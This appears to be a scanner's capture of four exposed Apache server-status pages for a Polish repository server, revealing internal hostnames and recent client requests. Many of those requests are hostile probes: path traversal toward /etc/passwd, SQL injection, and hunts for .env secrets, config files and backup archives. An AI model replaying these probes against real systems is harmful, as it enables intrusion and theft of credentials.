HTTP/1.1 1-95-0/0/559. 0.001998132652672380.00.004.39 62.210.101.203http/1.1repo.nimoz.pl:443POST /casmain.xgi HTTP/1.1 1-95-0/0/581. 0.001998132702800690.00.004.20 62.210.101.203http/1.1repo.nimoz.pl:443GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1 1-95-0/0/576. 0.001998136162844920.00.004.73 62.210.101.203http/1.1repo.nimoz.pl:443GET /v12/setup/temp/admin.php HTTP/1.1 1-95-0/0/594. 0.0019981302848940.00.004.11 62.210.101.203http/1.1repo.nimoz.pl:443GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% 1-95-0/0/598. 0.0019981302724290.00.004.39 62.210.101.203http/1.1repo.nimoz.pl:443GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passw 1-95-0/0/595. 0.001998138093263550.00.004.30 62.210.101.203http/1.1repo.nimoz.pl:443GET /package.war HTTP/1.1 1-95-0/0/632. 0.001998139862956170.00.006.11 62.210.101.203http/1.1repo.nimoz.pl:443GET /backup_4.war HTTP/1.1 1-95-0/0/544. 0.00199813554
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4489942aa00
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 23-Sep-2024 23:40:24 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 96 Parent Server MPM Generation: 95 Server uptime: 95 days 11 hours 7 minutes 16 seconds Server load: 0.00 0.00 0.00 Total accesses: 121574 - Total Traffic: 792.3 MB - Total Duration: 41937451 CPU Usage: u123.45 s121.47 cu344.56 cs24.61 - .00745% CPU load .0147 requests/sec - 100 B/second - 6.7 kB/request - 344.954 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 012581no0yes025000 215904no (old gen)0yes025000 314641no0yes025000 414730no0yes124000 Sum400 199000 _________________________.........................______________ _________________________________________________W___________... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-95125810/159/1176_ 8.056724233653250.00.599.43 78.153.140.224http/1.1repo.nimoz.pl:443GET /app/config/dev/.env HTTP/1.1 0-95125810/114/1117_ 8.115352223543400.00.418.06 78.153.140.223http/1.1repo.nimoz.pl:443GET /v2/api/.env HTTP/1.1 0-95125810/137/1171_ 8.156728263383710.00.458.50 45.156.129.108http/1.1repo.nimoz.pl:443GET /solr/ HTTP/1.1 0-95125810/139/1214_ 8.225352273623590.00.518.24 45.156.129.106http/1.1repo.nimoz.pl:443GET /aspera/faspex/ HTTP/1.1 0-95125810/122/1198_ 8.046728243674240.00.398.44 78.153.140.224http/1.1repo.nimoz.pl:443GET /app/frontend/.env HTTP/1.1 0-95125810/120/1110_ 8.166724213957450.00.367.89 45.156.129.105http/1.1repo.nimoz.pl:443GET /zabbix/favicon.ico HTTP/1.1 0-95125810/111/1080_ 8.012273855620.00.467.61 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-95125810/192/1199_ 8.310233571340.00.5110.83 146.190.242.161http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-95125810/137/1253_ 8.195360223450090.00.487.64 128.199.252.213h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95125810/125/1074_ 8.176723233512780.00.397.32 45.156.129.106http/1.1repo.nimoz.pl:443GET /sugar_version.json HTTP/1.1 0-95125810/117/1202_ 8.311284112720.00.9310.32 146.190.242.161http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-95125810/127/1136_ 8.312213757060.00.477.44 146.190.242.161http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-95125810/185/1151_ 8.205356253544880.01.279.04 45.156.129.106http/1.1repo.nimoz.pl:443GET /cgi-bin/config.exp HTTP/1.1 0-95125810/138/1177_ 8.2860303456200.00.4510.01 143.198.213.43http/1.1vm-repo-prd.nimoz.local:80POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 0-95125810/102/1070_ 7.915356203484460.00.347.16 128.199.252.213http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-95125810/133/1160_ 8.23103301720.00.427.53 165.154.100.58http/1.1vm-repo-prd.nimoz.local:80GET /core/l10n/zh_CN.js?v=c03a1674-3 HTTP/1.1 0-95125810/139/1234_ 8.015303643190.00.439.03 146.190.242.161h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95125810/162/1178_ 8.285352233954140.00.5010.57 128.199.252.213http/1.1repo.nimoz.pl:443GET /teorema505?t=1 HTTP/1.1 0-95125810/148/1132_ 7.95672303508120.00.447.04 78.153.140.224http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-95125810/106/1120_ 8.275353193588170.00.417.49 128.199.252.213http/1.1repo.nimoz.pl:443GET /favicon.ico HTTP/1.1 0-95125810/163/1256_ 7.82536104304290.00.407.71 78.153.140.223http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-95125810/194/1180_ 8.313243784900.00.558.54 146.190.242.161http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-95125810/120/1097_ 8.215353263728050.00.357.30 45.156.129.108http/1.1repo.nimoz.pl:443GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1 0-95125810/98/1127_ 8.12603493650230.00.377.44 23.94.30.25http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-95125810/159/1183_ 8.245361193575480.00.4911.63 128.199.252.213http/1.1repo.nimoz.pl:443GET /ab2h HTTP/1.1 1-95-0/0/585. 0.00316995333108540.00.004.10 62.210.101.203http/1.1repo.nimoz.pl:443POST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1 1-95-0/0/537. 0.00316999622761530.00.004.63 62.210.101.203http/1.1repo.nimoz.pl:443GET /148.81.110.91.war HTTP/1.1 1-95-0/0/578. 0.00316997942797140.00.004.52 62.210.101.203http/1.1repo.nimoz.pl:443GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1. 1-95-0/0/562. 0.00316999623003310.00.004.05 62.210.101.203http/1.1repo.nimoz.pl:443GET /2024.war HTTP/1.1 1-95-0/0/603. 0.00316999682987680.00.007.61 62.210.101.203http/1.1repo.nimoz.pl:443GET /password.cgi HTTP/1.1 1-95-0/0/677. 0.00316995973431420.00.004.99 62.210.101.203http/1.1repo.nimoz.pl:443GET /portal/attachment_downloadByUrlAtt.action?filePath=file:// 1-95-0/0/567. 0.00316999632902460.00.004.82 62.210.101.203http/1.1repo.nimoz.pl:443POST /Upload/upload_file.php?l=test HTTP/1.1 1-95-0/0/613. 0.00316999503087590.00.004.57 62.210.101.203http/1.1repo.nimoz.pl:443GET /sql.war HTTP/1.1 1-95-0/0/545. 0.00316995222755770.00.003.93 62.210.101.203http/1.1repo.nimoz.pl:443GET /Upload/test/2mTLlXObWlX7HYHtEEIGlKAInvm.php HTTP/1.1 1-95-0/0/597. 0.00316995853023400.00.004.80 62.210.101.203http/1.1repo.nimoz.pl:443GET /user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlv 1-95-0/0/623. 0.00316999712729140.00.004.79 62.210.101.203http/1.1repo.nimoz.pl:443GET /Server/CmxUser.php?pgid=UserList HTTP/1.1 1-95-0/0/552. 0.00316999893125260.00.003.91 62.210.101.203http/1.1repo.nimoz.pl:443GET /backup_3.war HTTP/1.1 1-95-0/0/604. 0.00316999973495530.00.005.34 62.210.101.203http/1.1repo.nimoz.pl:443GET /backups.war HTTP/1.1 1-95-0/0/641. 0.00316999762945160.00.004.80 62.210.101.203http/1.1repo.nimoz.pl:443GET /dump.war HTTP/1.1 1-95-0/0/623. 0.003169910113323170.00.004.08 62.210.101.203http/1.1repo.nimoz.pl:443GET /overview.asp HTTP/1.1 1-95-0/0/591. 0.00316999652700940.00.004.42 62.210.101.203http/1.1repo.nimoz.pl:443GET /upload.sql.tar.z HTTP/1.1 1-95-0/0/539. 0.00316999892854310.00.003.92 62.210.101.203http/1.1repo.nimoz.pl:443GET /bin.war HTTP/1.1 1-95-0/0/559. 0.00316992652672380.00.004.39 62.210.101.203http/1.1repo.nimoz.pl:443POST /casmain.xgi HTTP/1.1 1-95-0/0/581. 0.00316992702800690.00.004.20 62.210.101.203http/1.1repo.nimoz.pl:443GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1 1-95-0/0/576. 0.00316996162844920.00.004.73 62.210.101.203http/1.1repo.nimoz.pl:443GET /v12/setup/temp/admin.php HTTP/1.1 1-95-0/0/594. 0.003169902848940.00.004.11 62.210.101.203http/1.1repo.nimoz.pl:443GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..% 1-95-0/0/598. 0.003169902724290.00.004.39 62.210.101.203http/1.1repo.nimoz.pl:443GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passw 1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448d0f28030
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 22-Sep-2024 00:27:22 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 95 Parent Server MPM Generation: 94 Server uptime: 93 days 11 hours 54 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 101192 - Total Traffic: 704.3 MB - Total Duration: 33272282 CPU Usage: u79.33 s116.02 cu334.24 cs24.04 - .00685% CPU load .0125 requests/sec - 91 B/second - 7.1 kB/request - 328.803 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 09502no0yes124000 19503no0yes025000 215904no (old gen)0yes025000 Sum300 174000 ___________________W____________________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9495020/1/1008_ 0.00128103261420.00.008.78 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-9495020/0/996_ 0.001276203126670.00.007.61 161.35.77.208http/1.1repo.nimoz.pl:443POST / HTTP/1.1 0-9495020/0/1028_ 0.00753152978260.00.008.02 40.118.208.242http/1.1 0-9495020/0/1062_ 0.00127603197620.00.007.66 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /general/calendar/arrange/get_cal_list.php?starttime=154805 0-9495020/1/1068_ 0.011313085120.00.017.99 139.59.143.102http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-9495020/0/984_ 0.00103412070.00.007.48 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inP 0-9495020/0/967_ 0.00103249750.00.007.15 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9495020/0/997_ 0.001373217130.00.008.67 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9495020/0/1110_ 0.000383029400.00.007.12 139.59.143.102http/1.1 0-9495020/0/942_ 0.00003134710.00.006.78 139.59.143.102http/1.1 0-9495020/0/1082_ 0.00003669080.00.009.39 139.59.143.102http/1.1 0-9495020/0/999_ 0.00003286340.00.006.87 139.59.143.102h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9495020/0/958_ 0.00003084470.00.007.72 139.59.143.102http/1.1 0-9495020/1/1030_ 0.080233060630.00.019.50 139.59.143.102http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-9495020/1/960_ 0.090243104510.00.016.80 139.59.143.102http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-9495020/1/1018_ 0.090272871670.00.017.06 139.59.143.102http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-9495020/0/1091_ 0.00003141820.00.008.57 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /NmConsole/app.json HTTP/1.1 0-9495020/0/1010_ 0.00003566090.00.0010.05 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /myportal/control/main HTTP/1.1 0-9495020/1/976_ 0.090213073860.00.016.57 139.59.143.102http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-9495020/0/1004W 0.00003193740.00.007.05 139.59.143.102http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-9495020/0/1087_ 0.00163203841810.00.007.30 185.91.69.5http/1.1vm-repo-prd.nimoz.local:80GET /download/file.ext HTTP/1.1 0-9495020/0/983_ 0.00163203364710.00.007.96 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /uapim/static/pages/3/head.jsp HTTP/1.1 0-9495020/0/969_ 0.0016322163312720.00.006.90 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-9495020/0/1023_ 0.00163203062130.00.007.03 62.210.101.196http/1.1 0-9495020/0/1011_ 0.00163203156770.00.0011.07 47.89.131.164http/1.1vm-repo-prd.nimoz.local:80GET /core/img/favicon.ico HTTP/1.1 1-9495030/0/528_ 0.00163202554760.00.003.77 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /user/login HTTP/1.1 1-9495030/0/473_ 0.00163202195290.00.003.79 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80POST /ispirit/interface/gateway.php HTTP/1.1 1-9495030/0/522_ 0.0016321902319500.00.004.21 62.210.101.195http/1.1repo.nimoz.pl:443GET /ManagedIT.asmx HTTP/1.1 1-9495030/0/507_ 0.00163202557440.00.003.77 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /.env.old HTTP/1.1 1-9495030/0/549_ 0.001632222420820.00.007.30 62.210.101.195http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 1-9495030/0/619_ 0.001632482897620.00.004.69 138.68.64.69http/1.1repo.nimoz.pl:443POST /sdk HTTP/1.1 1-9495030/0/503_ 0.0016322132313230.00.004.46 62.210.101.195http/1.1repo.nimoz.pl:443GET /login HTTP/1.1 1-9495030/0/555_ 0.00163202388210.00.004.29 47.89.131.164http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-9495030/0/489_ 0.00163202201040.00.003.61 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /App_JScript/jquery.min.js HTTP/1.1 1-9495030/0/527_ 0.00163202452130.00.004.42 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /jenkins HTTP/1.1 1-9495030/0/565_ 0.00163202277970.00.004.42 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae 1-9495030/0/500_ 0.001632302401690.00.003.65 185.91.69.5http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-9495030/0/544_ 0.00163202802500.00.004.98 161.35.70.41http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-9495030/0/580_ 0.00163202405500.00.004.51 47.89.131.164http/1.1 1-9495030/0/568_ 0.001632272767020.00.003.73 185.91.69.5http/1.1repo.nimoz.pl:443GET /download/file.ext HTTP/1.1 1-9495030/0/542_ 0.001632162167300.00.004.14 62.210.101.195http/1.1repo.nimoz.pl:443GET /feed/ HTTP/1.1 1-9495030/0/486_ 0.00163202404680.00.003.63 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /service/~baseapp/UploadServlet HTTP/1.1 1-9495030/0/503_ 0.00163202112620.00.004.09 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /.env.backup HTTP/1.1 1-9495030/0/520_ 0.00163202316550.00.003.85 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /.env.stage HTTP/1.1 1-9495030/0/520_ 0.00002308880.00.004.42 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80GET /.env.148.81 HTTP/1.1 1-9495030/1/537_ 0.030242297250.00.013.80 139.59.143.102http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-9495030/1/537_ 0.030232196190.00.014.03 139.59.143.102http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-9495030/0/536_ 0.00002504280.00.003.98 62.210.101.195http/1.1vm-repo-prd.nimoz.local:80POST /service/v4_1/rest.php HTTP/1.1 1-9495030/1/581_ 0.030232392940.00.025.84 139.59.143.102http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-9495030/0/484_ 0.00102188410.00.003
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448eef0d2fc
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 19-Sep-2024 22:20:54 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 92 Parent Server MPM Generation: 91 Server uptime: 91 days 9 hours 47 minutes 46 seconds Server load: 0.00 0.00 0.00 Total accesses: 81438 - Total Traffic: 533.6 MB - Total Duration: 25907677 CPU Usage: u67.62 s112.69 cu294.66 cs21.46 - .00629% CPU load .0103 requests/sec - 70 B/second - 6.7 kB/request - 318.128 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 032484no0yes124000 132485no0yes025000 215904no (old gen)0yes025000 Sum300 174000 _____________________W__________________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-91324840/4/749_ 1.11156102144880.00.025.85 149.50.103.48http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-91324840/3/766_ 0.87656232058200.00.034.78 193.26.13.198http/1.1 0-91324840/6/740_ 0.69001921960.00.035.19 165.227.173.41http/1.1 0-91324840/4/787_ 0.881252124200.00.044.66 80.82.78.39http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-91324840/2/828_ 0.991202008340.00.034.64 193.26.13.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-91324840/5/761_ 0.95155302371280.00.024.73 69.164.218.80http/1.1 0-91324840/7/736_ 1.16156602181800.00.044.28 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-91324840/6/765_ 1.120322135190.00.055.73 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-91324840/5/858_ 1.10001978930.00.024.37 165.227.173.41http/1.1 0-91324840/6/699_ 1.260242048950.00.063.94 165.227.173.41http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-91324840/7/803_ 1.09002622830.00.066.64 165.227.173.41http/1.1 0-91324840/7/761_ 1.270222226050.00.054.06 165.227.173.41http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-91324840/4/737_ 0.841982181997620.00.024.81 167.94.145.99http/1.1 0-91324840/8/766_ 1.270261985500.00.066.21 165.227.173.41http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-91324840/8/743_ 1.18656282042970.00.053.78 85.90.246.159http/1.1repo.nimoz.pl:443POST /vpnsvc/connect.cgi HTTP/1.1 0-91324840/9/751_ 1.270221898980.00.054.39 165.227.173.41http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-91324840/5/807_ 1.270212052280.00.505.62 165.227.173.41http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-91324840/4/743_ 0.97156102502360.00.027.25 87.236.176.52http/1.1 0-91324840/9/728_ 1.10198001989500.00.033.74 167.94.145.99http/1.1 0-91324840/5/770_ 1.09102111190.00.024.01 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-91324840/9/767_ 1.11002731900.00.054.28 165.227.173.41http/1.1 0-91324840/3/746W 0.94002260180.00.025.04 165.227.173.41http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-91324840/5/713_ 1.140282202670.00.053.83 167.94.145.99http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-91324840/3/765_ 0.990192035200.00.054.23 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-91324840/10/756_ 1.191282093830.00.068.27 165.227.173.41http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/2/414_ 0.352947212201340.00.032.92 2.56.254.6http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-91324850/2/364_ 0.252947251837440.00.062.93 78.153.140.179http/1.1repo.nimoz.pl:443GET /stag/.env HTTP/1.1 1-91324850/2/425_ 0.44246202004300.00.013.45 138.68.84.168http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-91324850/1/385_ 0.09246102200810.00.012.88 138.68.84.168http/1.1 1-91324850/3/407_ 0.451983272060660.00.056.44 167.94.145.99http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/2/403_ 0.09198302585760.00.023.76 78.153.140.179http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-91324850/1/403_ 0.181976241984920.00.013.51 167.94.145.99http/1.1 1-91324850/2/440_ 0.261192019930.00.033.50 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-91324850/1/396_ 0.490201832380.00.022.74 165.227.173.41http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/3/404_ 0.38002111430.00.033.65 193.26.13.198http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 1-91324850/2/430_ 0.490261894410.00.033.50 165.227.173.41http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-91324850/3/406_ 0.390192066260.00.042.90 193.26.13.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/0/414_ 0.0011135252415840.00.004.06 78.153.140.179http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-91324850/2/447_ 0.4011134221995020.00.033.64 193.26.13.198http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/0/424_ 0.001113402403020.00.002.93 78.153.140.179http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-91324850/3/433_ 0.4011134181832620.00.033.37 193.26.13.198http/1.1repo.nimoz.pl:443GET /HNAP1/ HTTP/1.1 1-91324850/1/400_ 0.2111134232030690.00.012.85 78.153.140.179http/1.1repo.nimoz.pl:443GET /images/.env HTTP/1.1 1-91324850/2/411_ 0.3010148261754840.00.023.27 87.236.176.53h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-91324850/1/431_ 0.42924101988260.00.003.11 117.222.127.5http/1.1vm-repo-prd.nimoz.local:80GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0 1-91324850/3/426_ 0.334961221938830.00.043.60 95.214.55.43http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-91324850/1/414_ 0.329240231927340.00.012.91 78.153.140.179http/1.1repo.nimoz.pl:443GET /layout/.env HTTP/1.1 1-91324850/1/414_ 0.06922701829330.00.003.07 78.153.140.179http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-91324850/1/400_ 0.224961212103050.00.013.03 78.153.140.179http/1.1repo.nimoz.pl:443GET /media/.env HTTP/1.1 1-91324850/4/432_ 0.443630292026970.00.054.92 45.156.129.57http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-91324850/1/384_ 0.243630241866310.00.012.79 78.153.140.179http/1.1repo.nimoz.pl:443GET /public_html/.env HTTP/1.1 2-86159040/433/908_ 21.1123178252379320.02.085.83 78.153.140.179http/1.1repo.nimoz.pl:443GET /staticfiles/.env HTTP/1.1 2-86159040/381/798_ 20.672461222358420.02.07
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44825eac755
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Tuesday, 17-Sep-2024 23:43:46 CEST Restart Time: Thursday, 20-Jun-2024 12:33:08 CEST Parent Server Config. Generation: 90 Parent Server MPM Generation: 89 Server uptime: 89 days 11 hours 10 minutes 37 seconds Server load: 0.04 0.05 0.01 Total accesses: 81013 - Total Traffic: 529.9 MB - Total Duration: 25899209 CPU Usage: u66.65 s110.15 cu290.88 cs21.2 - .00632% CPU load .0105 requests/sec - 71 B/second - 6.7 kB/request - 319.692 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 215904no (old gen)0yes025000 726276no0yes124000 826277no0yes025000 Sum300 174000 ..................................................______________ ___________..................................................... ......................______________________W___________________ ________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-88-0/0/745. 0.008542302144610.00.005.84 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /.env.110 HTTP/1.1 0-88-0/0/763. 0.008542302057640.00.004.76 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /linusadmin-phpinfo.php HTTP/1.1 0-88-0/0/734. 0.0085423271921360.00.005.16 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/783. 0.0085423262123670.00.004.62 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/826. 0.0085423242007820.00.004.61 62.210.101.204http/1.1repo.nimoz.pl:443GET /ZmFzdGx5bmd3YWY HTTP/1.1 0-88-0/0/756. 0.008542302371030.00.004.71 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-88-0/0/729. 0.008542302180750.00.004.24 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /jenkins HTTP/1.1 0-88-0/0/759. 0.008542302134370.00.005.68 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1 0-88-0/0/853. 0.0085423281978610.00.004.34 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/693. 0.008542302047940.00.003.88 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /.env.development.local HTTP/1.1 0-88-0/0/796. 0.008542302621750.00.006.57 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /?phpinfo=1 HTTP/1.1 0-88-0/0/754. 0.0085423232225230.00.004.01 185.242.226.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-88-0/0/733. 0.008542301997430.00.004.79 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /.env.dev HTTP/1.1 0-88-0/0/758. 0.008542301984450.00.006.16 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /old_phpinfo.php HTTP/1.1 0-88-0/0/735. 0.00854231942042110.00.003.73 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/742. 0.0085423561898250.00.004.34 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/802. 0.0085423222045440.00.005.13 62.210.101.204http/1.1repo.nimoz.pl:443GET /index.php/login HTTP/1.1 0-88-0/0/739. 0.008542302502110.00.007.24 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /QC6nh/CVE-2023-47246.txt?true HTTP/1.1 0-88-0/0/719. 0.008542301988900.00.003.71 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80\x124\x02\x0e\x02\x02 0-88-0/0/765. 0.008542302110970.00.004.00 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /test.php HTTP/1.1 0-88-0/0/758. 0.008542302731040.00.004.23 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /.env.stage HTTP/1.1 0-88-0/0/743. 0.008542302259960.00.005.03 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80GET /.env.old HTTP/1.1 0-88-0/0/708. 0.0085423182201930.00.003.78 62.210.101.204http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-88-0/0/762. 0.008542302034430.00.004.18 62.210.101.204http/1.1vm-repo-prd.nimoz.local:80t3 12.2.1\n 